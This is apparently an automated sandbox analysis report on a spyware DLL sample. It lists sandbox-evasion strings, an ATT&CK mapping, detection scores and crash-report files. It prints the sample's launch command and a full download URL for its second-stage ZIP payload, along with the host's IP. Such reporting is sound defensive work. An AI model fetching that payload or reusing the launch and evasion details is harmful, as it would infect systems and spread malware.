Source: 0304PT[1].zip.8.drBinary or memory string: WrJcM+o9knoGYZTmQwgCiu5Yt1m6dGqEMuFvx2hH1QGs2aLrxtBt0Q2YRxo2NaVxEcEUrynjazrM
Source: 0304PT[1].zip.8.drBinary or memory string: hmmPi2UiDcXLgrTzei/uEh5vQHWoBAtTeMPP5WXXnBeVBogeOOhQvMcIX31Pc9wzPGB1GoAyVP6B
Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.drBinary or memory string: VMware20,1
Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: 0304PT[1].zip.8.drBinary or memory string: A0abLxQBR0bTGzI8KH1G/1PEXkwUdr/ueSJ5HjGCHHU1xPKMw66DMy8RQeMU1AlVupO5bqYb7etJ
Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: 0304PT[1].zip.8.drBinary or memory string: 55vsV1ux7kFGGaWY1tEaRdqTYlTxnRD/LGgFZKZcgczVMCixYQB2cQSqTF0UITMPkWCA1JMhcaTh
Source: 0304PT[1].zip.8.drBinary or memory string: Lv7lEEThGfsqPuZtLF2/Qlhel6bUDgPXqsL0HGTM2Rr8z4C1eCY/s1ne/+CLhuSsk3BZ4mDOoD26
Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
Source: 0304PT[1].zip.8.drBinary or memory string: t5bHGfSJCfyXqHpjOejPQrv7hRss0myL2dNSDucBoO2xC2pOJW2UIduFKF/lJUFSrprUX1l1g/6L
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 0304PT[1].zip.8.drBinary or memory string: IGPXEo17cupqEMU3MTXbqr00tS8QkzdYeu9Jiq9qp0y+u/WyukbqfRjWs0X+XP+gdWd3IUuUXt0u
Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_8-11385
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_11-12151
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 213.13.26.154 443Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,8_2_6C7CFB50
Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_6C7CEFB0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,11_2_6C7CFB50
Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_6C7CEFB0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C9DB2F4 GetUserNameW,8_2_6C9DB2F4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C7F1208 GetVersionExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,8_2_6C7F1208
Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		111
Process Injection		1
Masquerading		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		11
Virtualization/Sandbox Evasion		LSASS Memory11
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
Process Injection		Security Account Manager1
Account Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS1
System Owner/User Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information		LSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Rundll32		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432434 Sample: SecuriteInfo.com.Win32.Spyw... Startdate: 27/04/2024 Architecture: WINDOWS Score: 60 29 cld.pt 2->29 33 Multi AV Scanner detection for submitted file 2->33 35 Machine Learning detection for sample 2->35 9 loaddll32.exe 1 2->9         started        signatures3 process4 process5 11 rundll32.exe 15 9->11         started        15 cmd.exe 1 9->15         started        17 rundll32.exe 9->17         started        19 11 other processes 9->19 dnsIp6 31 cld.pt 213.13.26.154, 443, 49735 MEO-RESIDENCIALPT Portugal 11->31 37 System process connects to network (likely due to code injection or exploit) 11->37 21 rundll32.exe 15->21         started        23 WerFault.exe 16 17->23         started        25 WerFault.exe 19->25         started        signatures7 process8 process9 27 WerFault.exe 22 16 21->27         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll47%ReversingLabsWin32.Trojan.Barys
SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll44%VirustotalBrowse
SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
cld.pt
213.13.26.154
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://cld.pt/dl/download/5a0d8a94-236d-4a83-b1ba-16bf33ac459c/0304PT.zip?user-English%20(United%20Kingdom)false
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://cld.pt/dl/download/5a0d8a94-236d-4a83-b1ba-16bf33ac459c/0304PT.zip?user-Englishrundll32.exe, 00000008.00000002.2944942141.0000000004278000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2944650618.00000000028EB000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        http://upx.sf.netAmcache.hve.7.drfalse
          		high
          https://cld.pt/rundll32.exe, 00000008.00000002.2944650618.00000000028AA000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://cld.pt/dl/download/5a0d8a94-236d-4a83-b1ba-16bf33ac459c/0304PT.ziprundll32.exe, rundll32.exe, 0000000F.00000002.1858086486.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dllfalse
              		high
              https://cld.pt/dl/download/5a0d8a94-236d-4a83-b1ba-16bf33ac459c/0304PT.zip?user-English%20(United%2rundll32.exe, 00000008.00000002.2944650618.00000000028EB000.00000004.00000020.00020000.00000000.sdmpfalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                213.13.26.154
                		cld.ptPortugal
                		3243MEO-RESIDENCIALPTfalse

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1432434
                Start date and time:2024-04-27 03:31:06 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 8m 58s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:27
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll
                Detection:MAL
                Classification:mal60.evad.winDLL@33/15@1/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:Failed
                Cookbook Comments:
                • Found application associated with file extension: .dll

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 52.168.117.173
                • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                03:32:05API Interceptor1x Sleep call for process: loaddll32.exe modified
                03:32:15API Interceptor3x Sleep call for process: WerFault.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                213.13.26.154https://cld.pt/dl/download/c89835ff-781b-4959-be5a-67275492638b/CarrefourFacturaNOPAGO_REF19122023-A4-SIMPLEX-A9-TLLTK_FECHA20122023.zipGet hashmaliciousUnknownBrowse

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  cld.pthttps://cld.pt/dl/download/c89835ff-781b-4959-be5a-67275492638b/CarrefourFacturaNOPAGO_REF19122023-A4-SIMPLEX-A9-TLLTK_FECHA20122023.zipGet hashmaliciousUnknownBrowse
                  • 213.13.26.154
                  https://cld.pt/dl/download/9a9d89b2-99bf-4ca6-b445-5187b14ce9dc/TRANSF-A4-SIMPLEX-TLLK_B25293309_20230117.zipGet hashmaliciousUnknownBrowse
                  • 213.13.26.153
                  https://cld.pt/dl/download/37324902-32ed-4a24-a218-febba25bddb6/Arquivo.EndesaFatur08112022.zipGet hashmaliciousUnknownBrowse
                  • 213.13.26.152
                  Edp (16).vbsGet hashmaliciousUnknownBrowse
                  • 213.13.26.153
                  PDFs.exeGet hashmaliciousUnknownBrowse
                  • 213.13.26.152
                  PrintScanDoctor.exeGet hashmaliciousUnknownBrowse
                  • 213.13.26.152
                  gUrInxQRlD.msiGet hashmaliciousUnknownBrowse
                  • 213.13.26.153
                  U36WpJlxpN.msiGet hashmaliciousUnknownBrowse
                  • 213.13.26.153
                  AKJqw6RTKL.msiGet hashmaliciousUnknownBrowse
                  • 213.13.26.153
                  pop1.msiGet hashmaliciousUnknownBrowse
                  • 213.13.26.152

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  MEO-RESIDENCIALPTsora.arm7.elfGet hashmaliciousMiraiBrowse
                  • 144.67.11.197
                  BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                  • 194.65.93.23
                  sZyq3DvYmc.elfGet hashmaliciousMiraiBrowse
                  • 144.68.162.204
                  tajma.x86-20240421-1027.elfGet hashmaliciousMirai, OkiruBrowse
                  • 2.80.88.247
                  Vedtb2CYvY.elfGet hashmaliciousMiraiBrowse
                  • 144.67.11.143
                  arm7.elfGet hashmaliciousMiraiBrowse
                  • 144.67.70.47
                  la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                  • 188.83.87.235
                  EYhvUxUIsT.elfGet hashmaliciousMiraiBrowse
                  • 85.244.28.245
                  LppqiFoAhF.elfGet hashmaliciousMiraiBrowse
                  • 85.242.161.188
                  PhvvLCLFym.elfGet hashmaliciousMiraiBrowse
                  • 85.242.248.251

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  37f463bf4616ecd445d4a1937da06e19Document_a51_19i793302-14b09981a5569-3684u8.jsGet hashmaliciousLatrodectusBrowse
                  • 213.13.26.154
                  360total.dll.dllGet hashmaliciousLatrodectusBrowse
                  • 213.13.26.154
                  file.exeGet hashmaliciousVidarBrowse
                  • 213.13.26.154
                  neo.msiGet hashmaliciousLatrodectusBrowse
                  • 213.13.26.154
                  file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                  • 213.13.26.154
                  Dragons Dogma 2 v1.0 Plus 36 Trainer.exeGet hashmaliciousUnknownBrowse
                  • 213.13.26.154
                  Dragons Dogma 2 v1.0 Plus 36 Trainer.exeGet hashmaliciousUnknownBrowse
                  • 213.13.26.154
                  file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                  • 213.13.26.154
                  file.exeGet hashmaliciousVidarBrowse
                  • 213.13.26.154
                  BundleSweetIMSetup.exeGet hashmaliciousUnknownBrowse
                  • 213.13.26.154

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_1cfbaf5ca3181558ae23b5af2bc325da778f0_7522e4b5_14134091-3833-4e2b-8109-25cb573f144c\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9001121231256897
                  Encrypted:false
                  SSDEEP:192:efaiKwO9o200BU/wjeTP9zuiFTZ24IO8dci:OaiKhi2vBU/wjeRzuiFTY4IO8dci
                  MD5:C1A811C445F889DE1A8005588E33D6F8
                  SHA1:8F48360238BBBFD13447C3607748D5AC00B9CDA1
                  SHA-256:EDE80FC40584262009E06D4782D396B4CECA8FD2438F47D79882131D98D628A3
                  SHA-512:9917F86776A444948FA6A2F4CFF3DF34FF4D3CF1DA1132DA3BFF0C56B141865BAED65507FCDCE8885BCFDE29BEA2E2ED42D120C72DE1E1A02EFB8350387B6433
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.5.5.1.2.6.2.9.6.3.8.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.5.5.1.2.7.0.6.2.0.1.6.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.1.3.4.0.9.1.-.3.8.3.3.-.4.e.2.b.-.8.1.0.9.-.2.5.c.b.5.7.3.f.1.4.4.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.5.9.1.f.c.7.3.-.a.3.9.7.-.4.9.a.4.-.a.7.8.8.-.0.8.0.3.1.7.9.5.0.7.9.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.5.8.-.0.0.0.1.-.0.0.1.4.-.0.c.2.3.-.5.8.b.6.4.2.9.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dbcb93d956ac28a5c3196766f9d12867aad21a0_7522e4b5_15e6224a-47ff-4b73-8f65-4223cf6f8bc8\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9055865613042028
                  Encrypted:false
                  SSDEEP:192:3FYNiQwOe2X0BU/wjeTP9zuiFTZ24IO84ci:1YNiQhe2kBU/wjeRzuiFTY4IO84ci
                  MD5:72BAB85108ABEF5E1C41A36AC4E4A965
                  SHA1:42DF59CAA3D859A6AE82E1A288C272599AA7BA5F
                  SHA-256:DA53A568FF803F8994481330041BE04413445AE64C3F6E2A7DA39DBDA81E9D59
                  SHA-512:A073422E1421BD127DD8D315E1B65A73EB08B41C8F7E9AF90F0DF04278A76E3AE9EB1B88EE80DA4B8AA26CC3007AB71F2B348BE97BFC31196A0D951C31436B79
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.5.5.1.1.6.8.2.2.6.9.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.5.5.1.1.7.1.8.2.0.7.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.e.6.2.2.4.a.-.4.7.f.f.-.4.b.7.3.-.8.f.6.5.-.4.2.2.3.c.f.6.f.8.b.c.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.c.c.e.2.a.7.f.-.f.9.f.e.-.4.f.7.1.-.9.b.c.f.-.f.5.4.c.5.a.e.3.1.5.8.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.b.c.-.0.0.0.1.-.0.0.1.4.-.0.9.6.9.-.e.4.b.0.4.2.9.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.2.d.7.!.r.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dbcb93d956ac28a5c3196766f9d12867aad21a0_7522e4b5_64b4cab0-55cb-4fcf-9c67-4f15a83827f1\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9055916752526356
                  Encrypted:false
                  SSDEEP:192:p5ViOwOC2X0BU/wjeTP9zuiFTZ24IO84ci:ViOhC2kBU/wjeRzuiFTY4IO84ci
                  MD5:13350796DB6761F9F65B6DE51F2AFD56
                  SHA1:F1064D8E4DF72E73E1D74B4F5D3ADE47225D02EB
                  SHA-256:BD5CD306F508AD568D3564F497C6BC4659B115B0BC605BF9BD3E44F0EC90311F
                  SHA-512:B0DB1B65C1789BCB782AEBDDA8FDC249284BF725CAC5FE73D371DA10CC0E32AD3BFFC9C2F99374E9784B3DD4892ABA0192F1F9E1DCB2664C5275AEB5C345118C
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.5.5.1.2.6.3.7.3.2.1.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.5.5.1.2.7.0.1.3.8.2.5.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.b.4.c.a.b.0.-.5.5.c.b.-.4.f.c.f.-.9.c.6.7.-.4.f.1.5.a.8.3.8.2.7.f.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.c.5.8.4.3.f.-.5.b.f.5.-.4.e.d.1.-.9.7.d.5.-.9.d.0.4.8.d.a.b.3.2.2.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.4.8.-.0.0.0.1.-.0.0.1.4.-.8.8.1.b.-.5.4.b.6.4.2.9.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.2.d.7.!.r.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8FDD.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Sat Apr 27 01:31:56 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):43218
                  Entropy (8bit):1.972843569491744
                  Encrypted:false
                  SSDEEP:192:bVct13g6dfTWlO5H4cbSGn+hWnJ4ec1KQjuPLl66SD:JeJgO6I5HRSGd2ec1KQY66I
                  MD5:7C55072BB5338EBBD63481AD2513D6D6
                  SHA1:50B18281CF8BDE4BD08BF4F82FBB723373C8918E
                  SHA-256:F5D656C5695B7225CE777FF861FBB146F7CC286479736D63E89E7F3B59F3FEDC
                  SHA-512:AC8404D578B329F50F492FEE39701F225216C8A6158D116F02F17F29BAB0F37B9D93D65E6461C43D970BFEB49A99E99A55E6CD0E3D6C880B4C191AAC51AA1A1C
                  Malicious:false
                  Preview:MDMP..a..... ........U,f.........................................*..........T.......8...........T...........P...........................l...............................................................................eJ..............GenuineIntel............T............U,f.............................0..=...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER9099.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8398
                  Entropy (8bit):3.6950825689663707
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJnB6opv6Yet6mZgmf8tbprB89bOfsf8Ye6m:R6lXJB6e6Y86Ygmf8t4OEf8Y6
                  MD5:5A906C783491E3F454E5378C9B998A9F
                  SHA1:5138616C643140729FFC1F7AAFFBF0432D4D0ABA
                  SHA-256:AA50F8B35D56AAF00E6EECFA5CC27CE6AC5409C2865E5F58C462F9C8F8B1313F
                  SHA-512:19E675C7300C766D5608BDFF86A8507E45EF935879B3F4810305EAE217172BF651BF731BDBEC4039B06DEA7F953C0FF6D98517316DFFEAC13B62D94E8C062BFB
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. 